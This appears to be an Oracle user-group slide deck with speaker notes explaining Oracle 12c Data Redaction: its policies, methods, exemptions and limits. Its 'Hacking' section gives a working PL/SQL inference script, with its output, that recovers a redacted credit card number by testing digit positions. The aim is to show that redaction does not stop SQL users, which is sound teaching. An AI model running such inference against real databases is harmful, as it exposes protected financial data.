4. Follow: @UKOUG
Daniel Da Meda
•18 Years of experience using Oracle Technologies
•7 Years working as a Senior DBA in the UK for a variety of companies like
TimeWarner, Johnson&Johnson, Network Rail and John Deere
•Moved to Angola over 2 years ago where I continue to work Senior DBA
providing services for the Ministry of Finance
•Photographer Enthusiast
http://thatoracledude.blogspot.com/
@ddameda
daniel.da.meda@hotmail.com
http://www.guoa.org/
7. Follow: @UKOUG
Data Redaction
• One of the new features introduced in
Oracle Database 12c
• Part of the Advanced Security option
• Enables the protection of data shown to
the user in real time, without requiring
changes to the application
8. • Applies protection at query execution time
• The stored data remain unchanged
Redaction takes place immediately preceding the return of selected
data and only at the top level of a SELECT list
• It is not an operation shown in the
Follow: @UKOUG
execution plan
9. Follow: @UKOUG
Policy
SELECT rep.object_name as "OBJECT",
rep.policy_name,
rep.expression,
rep.enable,
rec.column_name as "COLUMN",
rec.function_type
FROM redaction_policies rep,
redaction_columns rec
WHERE rep.object_owner = rec.object_owner
AND rep.object_name = rec.object_name;
OBJECT POLICY_NAME EXPRESSION ENABLE COLUMN FUNCTION_TYPE
------ ----------- ------------------------------------------------ ------ ------ --------------
EMP SCOTT_EMP SYS_CONTEXT('SYS_SESSION_ROLES','MGR') = 'FALSE' YES SALARY FULL REDACTION
10. SQL> EXPLAIN PLAN FOR SELECT * FROM EMP;
SQL> SELECT * FROM table(DBMS_XPLAN.DISPLAY(format=>'ALL'));
Follow: @UKOUG
As SCOTT with the MGR role:
--------------------------------------------------------------------------
| Id | Operation | Name | Rows | Bytes | Cost (%CPU)| Time |
--------------------------------------------------------------------------
| 0 | SELECT STATEMENT | | 3 | 36 | 3 (0)| 00:00:01 |
| 1 | TABLE ACCESS FULL| EMP | 3 | 36 | 3 (0)| 00:00:01 |
--------------------------------------------------------------------------
As SCOTT without the MGR role:
--------------------------------------------------------------------------
| Id | Operation | Name | Rows | Bytes | Cost (%CPU)| Time |
--------------------------------------------------------------------------
| 0 | SELECT STATEMENT | | 3 | 36 | 3 (0)| 00:00:01 |
| 1 | TABLE ACCESS FULL| EMP | 3 | 36 | 3 (0)| 00:00:01 |
--------------------------------------------------------------------------
11. Not to be confused with
Oracle Data Masking
With Oracle Data Masking, the data is
processed using masked shapes and this
updated data is stored in new data blocks.
For this reason, Data Masking is more
suitable for non-production environments.
** Oracle Data Masking is available only with Enterprise Edition
database and it requires licensing of Advanced Security.
Follow: @UKOUG
12. Below are some other features that already
existed to help making the data more secure:
•Virtual Private Database (VPD) - Allows control access
on both row and column levels by dynamically adding a
predicate to SQL statements issued against the database.
•Oracle Label Security – Allows you to add user-defined
values to table records combining it with VPD to allow fine
control of who sees what .
•Database Vault – Data Redaction does not prevent
privileged users (such as DBAs) from having access to the
data being protected. To solve this, you can make use of
Database Vault.
Follow: @UKOUG
13. Planning on Oracle Data Redaction Policy
1. Ensure that you have been granted the EXECUTE privilege on
Follow: @UKOUG
the DBMS_REDACT PL/SQL package.
2. Determine the data type of the table or view column that you want to
redact.
3. Ensure that this column is not used in an Oracle Virtual Private
Database (VPD) row filtering condition. That is, it must not be part of
the VPD predicate generated by the VPD policy function.
4. Decide on the type of redaction that you want to perform: full,
random, partial, regular expressions, or none.
5. Decide which users to apply the Data Redaction policy to.
6. Based on this information, create the Data Redaction policy by using
the DBMS_REDACT.ADD_POLICY procedure.
7. Configure the policy to have additional columns to be redacted
16. Follow: @UKOUG
DBMS_REDACT
• DBMS_REDACT.ALTER_POLICY
Allows changes to existing policies.
• DBMS_REDACT.DISABLE_POLICY
Disables an existing policy.
• DBMS_REDACT.DROP_POLICY
Drop an existing policy.
• DBMS_REDACT.ENABLE_POLICY
Enables an existing policy.
• DBMS_REDACT.UPDATE_FULL_REDACTION_VALUES
Change the default return value for full redaction.
You must restart the database to take effect.
18. Follow: @UKOUG
Redaction Methods
• Full redaction
• Partial redaction
• Regular expressions
• Random redaction
• No redaction
19. Follow: @UKOUG
FULL Data Redaction
•Character Data Types
The output text is a single space
•Number Data Types
The output text is a zero
•Date-Time Data Types
The output text is set to the first day of January, 2001
20. Follow: @UKOUG
RANDOM Data Redaction
•CHAR Data Types
Redacted in same character set and byte length as the column
definition
•Number Data Types
Redacted in same character set and the length is limited based
on the length of the actual data
•Date-Time Data Types
Redacted as random dates that are always different from those
of the actual data
31. Operational Activities - No Redaction
•Backup and Restore
•Import and Export
•Patching and Upgrades
•Replication
•Users SYS and SYSTEM automatically have
the EXEMPT REDACTION POLICY system
privilege
•Data Redaction is not enforced for users
connected as SYSDBA
Follow: @UKOUG
32. Data Redaction and Data Pump
ORA-28081: Insufficient privileges - the command
Follow: @UKOUG
references a redacted object
Use the EXEMPT REDACTION POLICY system privilege
in these cases. However, use it with caution.
Note that the role DATAPUMP_EXP_FULL_DATABASE
includes the EXEMPT REDACTION POLICY system
privilege
33. In order to perform a CREATE TABLE AS SELECT
operation from a table protected by an active redaction
policy, the user must have privileges to see the actual
data on the source table
Because applications may need to perform CREATE
TABLE AS SELECT operations that involve redacted
source columns, you can grant the application the
EXEMPT DDL REDACTION POLICY system privilege.
Follow: @UKOUG
Data Redaction and CTAS
34. Redacted Columns and GROUP BY SQL Expressions
Redacted Columns included in SQL expressions on a GROUP BY clause will fail as follows:
SQL> select * from emp;
EMP_NO NAME SALARY
---------- ---------------------------------------- ----------
1 Daniel 702
2 Juca 607
3 Manuel 314
SQL> /
EMP_NO NAME SALARY
---------- ---------------------------------------- ----------
1 Daniel 900
2 Juca 466
3 Manuel 220
SQL> select (salary*1.10) from emp group by (salary*1.10);
select (salary*1.10) from emp group by (salary*1.10)
Follow: @UKOUG
*
ERROR at line 1:
ORA-00979: not a GROUP BY expression
35. •Columns from MVIEWS as well as regular VIEWS
can be redacted
•Inline views are redacted outermost
•VPD Inline view with the predicate is not affected
as it acts on the actual values
•Redaction policies defined on a VIEW column will
override the redaction policy defined on the base
table column. Example on next slide
Follow: @UKOUG
Data Redaction and Views
SELECT XYZ … AS SELECT A… AS SELECT B… AS
SELECT C…
In the above example, SELECT XYZ is redacted first,
then SELECT A, SELECT B and so on
36. Data Redaction and Views
Consider the following Policy on column SALARY of table EMP
OBJECT EXPRESSION ENABLE COLUMN FUNCTION_TYPE
--------- -------------------------------------------------- ------ ------------- ----------------
EMP SYS_CONTEXT('SYS_SESSION_ROLES','MGR') = 'FALSE' YES SALARY RANDOM REDACTION
Follow: @UKOUG
A VIEW named EMP_V is created as follows:
OBJECT EXPRESSION ENABLE COLUMN FUNCTION_TYPE
--------- -------------------------------------------------- ------ ------------- ----------------
EMP_V SYS_CONTEXT('SYS_SESSION_ROLES','MGR') = 'FALSE' YES SALARY NO REDACTION
37. Follow: @UKOUG
Data Redaction and Views
Selecting from the EMP table:
SQL> select * from emp where name='Daniel';
EMP_NO NAME SALARY
---------- ----------------------- ----------
1 Daniel 706
SQL> select * from emp_v where name='Daniel';
EMP_NO NAME SALARY
---------- ----------------------- ----------
1 Daniel 1001
38. Follow: @UKOUG
Overhead
• It could reach up to 10% of performance impact
when using complex Regular Expressions
• Between 2-3% performance impact using other
redaction methods
39. •Never to be considered as a way to protect
data from anyone with SQL access to the
database
•Extremely easy to hack once you have access
to SQL
•It was never designed to protect data from the
attack we will demonstrate
Follow: @UKOUG
Hacking
41. Hacking - Finding Actual Values by
Follow: @UKOUG
Inference
SQL> SHOW USER
USER is "WATCHER“
SQL> SELECT * FROM customers;
CUSTOMER_ID NAME CREDITCARD_NO
----------- -------------------- ----------------
1 Daniel Da Meda ************4368
2 Alex Zaballa ************5211
3 Antonio Mateus ************5005
42. Hacking - Finding Actual Values by
Follow: @UKOUG
SET TIMING ON
SET SERVEROUTPUT ON
DECLARE
vcreditcard_no CUSTOMERS.creditcard_no%TYPE;
vcustomer_name CUSTOMERS.name%TYPE;
BEGIN
FOR a in 1..19 LOOP
IF a NOT IN (5,10,15) THEN
FOR b in 0..9 LOOP
BEGIN
SELECT name
INTO vcustomer_name
FROM CUSTOMERS
WHERE customer_id=2
AND SUBSTR(creditcard_no,a,1) = b;
vcreditcard_no:=vcreditcard_no||b;
EXCEPTION
WHEN NO_DATA_FOUND THEN
NULL;
END;
END LOOP;
ELSE
vcreditcard_no:=vcreditcard_no||'-';
END IF;
END LOOP;
DBMS_OUTPUT.PUT_LINE('Credit Card Number for '||vcustomer_name||' is: '||vcreditcard_no);
END;
/
Inference
43. Hacking - Finding Actual Values by
Follow: @UKOUG
vi get_creditcard.sql
Inference
[oracle@12c Desktop]$ sqlplus watcher/icanseeyou@pdbdev
SQL*Plus: Release 12.1.0.2.0 Production on Wed Nov 5 11:26:53 2014
Copyright (c) 1982, 2014, Oracle. All rights reserved.
Connected to:
Oracle Database 12c Enterprise Edition Release 12.1.0.2.0 - 64bit
Production
With the Partitioning, Automatic Storage Management, OLAP, Advanced
Analytics
and Real Application Testing options
SQL> @get_creditcard.sql
Credit Card Number for Alex Zaballa is: 5102-6342-4881-5211
PL/SQL procedure successfully completed.
Elapsed: 00:00:00.03
For me, oracle should provide security features for free, specially for enterprise edition
But it is just my opinion.
The next slide will show that the execution plans do not change between queries which return redacted data and queries that do not return redacted data.
The above slide shows that a policy named SCOTT_EMP exists for a table called EMP.
The policy is enabled and it is supposed to redact the salary column for sessions that do not have the MGR role.
This slide makes it clear that there is no distinction between execution plans of the same statement with or without data redaction taking place.
The redaction magic must happen right after the TOP level operation of the execution plan and before the data is sent to the client.
Here a some examples of conditional artefacts that can be used to drive redaction policies
Import and Export: Data Redaction policies associated with tables and views are included in the export and import operation. Therefore, the policies are enabled and the data is redacted when users
query the objects in the imported database
SYSTEM has the EXP_FULL_DATABASE role, which includes the EXEMPT REDACTION POLICY system privilege.
Check with Zaballa about replication and Backup&Recovery tasks involving redacted columns
Alternatively, you can perform the export with a user that is exempt from the redaction policy. Namely, a user that doesn't fall under the redaction criteria
Because applications may need to perform CREATE TABLE AS SELECT operations that involve redacted source columns, you can grant the application the EXEMPT DDL REDACTION POLICY system privilege.
The above example shows a table emp that has a redaction policy enabled on column SALARY.
The redaction method is RANDOM but it could be any other redaction method.
Inline Views
ELECT XYZ … AS SELECT A… AS SELECT B… AS SELECT C…, SELECT XYZ is redacted first, followed by AS SELECT A, then AS SELECT B, and so on. AS SELECT C is redacted last.
Data Redaction and Views
Here we can see that when we select from a view, redaction does not take place even though the EMP base table has a redaction policy defined on the SALARY column.
Data Redaction and Views
Here we can see that when we select from a view, redaction does not take place even though the EMP base table has a redaction policy defined on the SALARY column.
According to our tests it could reach up to 10% of performance impact when using complex RegEx and between 2-3% performance impact using other redaction methods